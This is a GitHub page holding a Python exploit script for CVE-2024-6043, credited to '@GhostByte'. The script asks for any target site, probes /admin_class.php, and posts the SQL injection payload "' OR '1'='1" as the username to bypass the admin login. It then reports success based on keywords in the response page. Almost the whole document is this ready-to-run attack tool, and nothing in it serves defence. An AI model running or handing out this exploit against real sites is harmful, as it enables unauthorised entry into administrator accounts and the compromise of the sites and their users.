-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-6043.py
79 lines (69 loc) · 4.1 KB
/
CVE-2024-6043.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import requests
import time
import sys
laz_headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}
def check_path_exists(laz_url):
try:
response = requests.get(laz_url, headers=laz_headers)
if response.status_code == 200:
return True
else:
return False
except requests.exceptions.RequestException as e:
print(f"Error checking the path: {e}")
return False
def inject_payload(laz_url, laz_payload):
laz_data = {
"username": laz_payload,
"password": "any_password"
}
try:
response = requests.post(laz_url, data=laz_data, headers=laz_headers)
return response
except requests.exceptions.RequestException as e:
print(f"Error during injection: {e}")
return None
def simulate_injection():
animation = "|/-\\"
for _ in range(20):
sys.stdout.write(f"\rInjecting... {animation[_ % len(animation)]}")
sys.stdout.flush()
time.sleep(0.1)
print("\rInjection complete. ")
def check_injection_success(laz_response):
# Cheking for comon signs of SQL Inje
if any(keyword in laz_response.text for keyword in ["Welcome", "Dashboard", "admin", "logout"]):
return True
return False
def main():
print("""
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔════╝ ██╔═████╗██║ ██║╚════██╗
██║ ██║ ██║█████╗ █████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗███████╗ ██║██╔██║███████║ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝ ╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══██╗████╔╝██║╚════██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝╚██████╔╝ ██║██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝╚═════╝
BY @GhostByte discord.gg/byt
""")
laz_target = input("Enter the target site (e.g., http://target-site.com): ").strip()
laz_admin_path = laz_target + "/admin_class.php"
print(f"Checking if {laz_admin_path} exists...")
if check_path_exists(laz_admin_path):
print("The path exists.")
proceed = input("Do you want to inject the payload? (Y/N): ").strip().lower()
if proceed == 'y':
laz_payload = "' OR '1'='1"
simulate_injection()
laz_response = inject_payload(laz_admin_path, laz_payload)
if laz_response and check_injection_success(laz_response):
print("SQL Injection successful! Admin login bypassed.")
else:
print("SQL Injection failed. The target might be patched or not vulnerable.")
else:
print("Injection aborted by the user.")
else:
print(f"The path {laz_admin_path} does not exist. Exiting.")
if __name__ == "__main__":
main()